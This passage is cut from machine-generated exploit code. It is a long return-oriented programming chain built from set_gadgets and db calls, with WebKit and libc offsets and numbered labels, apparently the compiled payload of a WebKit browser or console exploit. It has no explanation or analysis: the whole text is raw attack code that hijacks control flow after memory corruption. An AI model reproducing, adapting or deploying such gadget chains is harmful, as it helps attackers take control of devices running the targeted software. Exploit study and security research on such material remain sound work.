webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L10629:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10630:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10631:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+490032, //L10633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+490080, //L10636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+490048, //L10634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L10633:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10634:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10635:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10636:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+490192, //L10637+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+490184, //L10637
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L10637:
db([0, 0]); // 0x0
set_gadgets([
ropchain+490208, //L10637+24
ropchain+494232, //L10632
//L10638:
libc_base+764760, //pop rsi
ropchain+490248, //L10639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10639:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10641:
db([4294967220, 4294967295]); // -0x4c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+490368, //L10644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+490352, //L10642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10642:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10644:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+490544, //L10647
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+490560, //L10648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+490512, //L10645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+490528, //L10646
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10645:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10646:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10647:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10648:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+490656, //L10650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+490640, //L10649
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10649:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10650:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+490744, //L10652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L10651:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L10652:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+490800, //L10653
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10653:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10655:
db([4294967220, 4294967295]); // -0x4c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+490880, //L10657
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10657:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+491016, //L10660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+491000, //L10659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10658:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10659:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10660:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+491120, //L10662
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+491104, //L10661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10661:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10662:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+491200, //L10663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10663:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10665:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+491320, //L10668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+491304, //L10666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10666:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10668:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+491496, //L10671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+491512, //L10672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+491464, //L10669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+491480, //L10670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10669:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10670:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10671:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10672:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+491672, //L10676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+491640, //L10674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+491656, //L10675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10673:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10674:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10675:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10676:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+491760, //L10677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+491776, //L10678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10677:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10678:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+491952, //L10680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+491968, //L10681
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+491936, //L10679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L10679:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10680:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10681:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+492080, //L10683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+492128, //L10686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+492096, //L10684
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L10683:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10684:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10685:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10686:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+492240, //L10687+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+492232, //L10687
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L10687:
db([0, 0]); // 0x0
set_gadgets([
ropchain+492256, //L10687+24
ropchain+494200, //L10682
libc_base+764760, //pop rsi
ropchain+492296, //L10688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10688:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10690:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+492416, //L10693
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+492400, //L10691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10691:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10693:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+492560, //L10696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+492528, //L10694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+492544, //L10695
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10694:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10695:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10696:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+492640, //L10697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10697:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10699:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+492760, //L10702
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+492744, //L10700
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10700:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10702:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+492904, //L10705
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+492872, //L10703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+492888, //L10704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10703:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10704:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10705:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+492992, //L10707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L10706:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L10707:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+493048, //L10708
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10708:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10710:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+493128, //L10712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10712:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+493240, //L10713
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10713:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10715:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+493360, //L10718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+493344, //L10716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10716:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10718:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+493504, //L10721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+493472, //L10719
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+493488, //L10720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10719:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10720:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10721:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+493584, //L10722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L10722:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10723:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L10724:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+493712, //L10726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+493696, //L10725
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10725:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10726:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+493792, //L10727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10727:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10729:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+493912, //L10732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+493896, //L10730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10730:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10732:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+493992, //L10734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+494024, //L10736
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10734:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L10735:
ropchain+494152, //L10733
libc_base+144605 //pop rdi
]);
//L10736:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+494128, //L10738
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+494144, //L10737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L10738:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L10737:
db([0, 0]); // 0x0
//L10733:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+494216, //L10739
//L10682:
libc_base+782311, //pop rsp
ropchain+494232, //L10740
//L10739:
libc_base+782311, //pop rsp
ropchain+490208, //L10638
//L10740:
//L10632:
libc_base+764760, //pop rsi
ropchain+494272, //L10741
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10741:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10743:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+494392, //L10746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+494376, //L10744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10744:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10746:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+494536, //L10749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+494504, //L10747
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+494520, //L10748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10747:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10748:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10749:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+494616, //L10750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10750:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10752:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+494736, //L10755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+494720, //L10753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10753:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10755:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+494880, //L10758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+494848, //L10756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+494864, //L10757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10756:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10757:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10758:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+494968, //L10760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L10759:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L10760:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+495024, //L10761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10761:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10763:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+495104, //L10765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10765:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+495216, //L10766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10766:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10768:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+495336, //L10771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+495320, //L10769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10769:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10771:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+495480, //L10774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+495448, //L10772
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+495464, //L10773
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10772:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10773:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10774:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+495560, //L10775
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10775:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10777:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+495680, //L10780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+495664, //L10778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10778:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10780:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+495840, //L10784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+495792, //L10781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+495808, //L10782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10781:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10782:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10783:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L10784:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
